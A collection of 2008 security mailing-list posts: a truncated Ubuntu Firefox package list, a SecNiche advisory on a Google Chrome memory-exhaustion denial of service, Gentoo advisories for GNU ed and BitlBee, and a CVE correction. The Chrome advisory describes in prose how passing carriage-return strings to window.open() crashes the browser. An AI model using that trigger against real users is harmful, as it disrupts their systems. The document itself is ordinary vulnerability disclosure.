http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17+0nobinonly-0ubuntu0.7.4.dsc Size/MD5: 2330 b5027c93757b9fec8eda43ee3b93c227 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17+0nobinonly.orig.tar.gz Size/MD5: 48478465 eb9ca16ce2bd6073cf9cdf1298388ede Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5: 243550 c27985a28b56d42f853f614b1329792f http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5:58896 6617ca36bca4b8f4039a0201548da883 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5:58992 330db0a6f2247bc95308f45849f6c347 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb Size/MD5:59004 de6dddee9f8f3b426f3f92486ec688f4 http://securit
Advisory : Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.
*Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.* *Version Affected:* Chrome/0.2.149.30 Chrome/0.2.149.29 *Severity:* High *Description:* The Google chrome browser is vulnerable to memory exhaustion based denial of service which can be triggered remotely.The vulnerability triggers when Carriage Return(\r\n\r\n) is passed as an argument to window.open() function. It makes the Google Chrome to generate number of windows at the same time thereby leading to memory exhaustion. The behavior can be easily checked by looking at the task manager as with no time the memory usage rises high. The problem lies in the handling of object and its value returned by the javascript function. Once it is triggered the pop ups are started generating. The Google Chrome browser generate object windows continuously there by affecting memory of the resultant system. Probably it can be crashed within no time. User interaction is required in this. *Proof of Concept* http://www.secniche.org/gds *Links:* http://secniche.org/gcrds.html http://evilfingers.com/advisory/Google_Chrome_Carriage_Return_Null_Object_Memory_Exhaustion_Remote_Dos.php *Detection:* SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are: Chrome/0.2.149.30 Chrome/0.2.149.291 *Disclosure Timeline:* Disclosed: 22 September 2008 Release Date. September 24 ,2008 *Vendor Response:* Google acknowledges this vulnerability and "fix" will be released soon. *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
[ GLSA 200809-15 ] GNU ed: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GNU ed: User-assisted execution of arbitrary code Date: September 23, 2008 Bugs: #236521 ID: 200809-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow vulnerability in ed may allow for the remote execution of arbitrary code. Background == GNU ed is a basic line editor. red is a restricted version of ed that does not allow shell command execution. Affected packages = --- Package / Vulnerable / Unaffected --- 1 sys-apps/ed< 1.0 >= 1.0 Description === Alfredo Ortega from Core Security Technologies reported a heap-based buffer overflow in the strip_escapes() function when processing overly long filenames. Impact == A remote attacker could entice a user to process specially crafted commands with ed or red, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All GNU ed users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-apps/ed-1.0" References == [ 1 ] CVE-2008-3916 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3916 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-15.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ GLSA 200809-14 ] BitlBee: Security bypass
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: BitlBee: Security bypass Date: September 23, 2008 Bugs: #236160 ID: 200809-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Bitlbee may allow to bypass security restrictions and hijack accounts. Background == BitlBee is an IRC to IM gateway that support multiple IM protocols. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-im/bitlbee < 1.2.3 >= 1.2.3 Description === Multiple unspecified vulnerabilities were reported, including a NULL pointer dereference. Impact == A remote attacker could exploit these vulnerabilities to overwrite existing IM accounts. Workaround == There is no known workaround at this time. Resolution == All BitlBee users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-im/bitlbee-1.2.3" References == [ 1 ] CVE-2008-3920 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3920 [ 2 ] CVE-2008-3969 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3969 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
mantis CVE-2008-3102 (Re: menalto gallery: Session hijacking vulnerability, CVE-2008-3102)
Damn, subject is obviously wrong, it's mantis, gallery was already CVE-2008-3662. Rest of the advisory is correct though. Sorry for the confusion. -- Hanno Böck Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber/Mail:[EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part.
